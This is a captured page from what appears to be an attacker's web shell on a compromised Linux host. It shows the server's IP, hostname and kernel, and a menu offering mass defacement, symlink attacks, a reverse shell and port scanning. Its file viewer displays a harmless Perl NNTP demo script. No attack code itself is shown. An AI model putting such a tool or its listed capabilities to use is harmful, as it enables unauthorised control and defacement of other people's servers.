ヤミRoot VoidGate
User / IP
:
216.73.216.2
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
.cpanm
/
work
/
1568630680.21759
/
libnet-3.11
/
demos
/
Viewing: nntp
#!perl use 5.008001; use strict; use warnings; use blib; use Getopt::Long; use Net::NNTP; our $opt_debug = undef; GetOptions(qw(debug)); my @groups = @ARGV; my $nntp = Net::NNTP->new('news', Debug => $opt_debug ? 1 : 0); my $subs; if($subs = $nntp->newsgroups) { print join("\n",(keys %$subs)[0 .. 10]),"\n"; } else { warn $nntp->message; } foreach my $group (@groups) { my $news = $nntp->newnews(time - 3600, lc $group); if(ref($news) && scalar(@$news)) { print @{$news}[0..3],"\n" if $news = $nntp->article($news->[-1]); warn $nntp->message unless $news; } } $nntp->quit;
Coded With 💗 by
0x6ick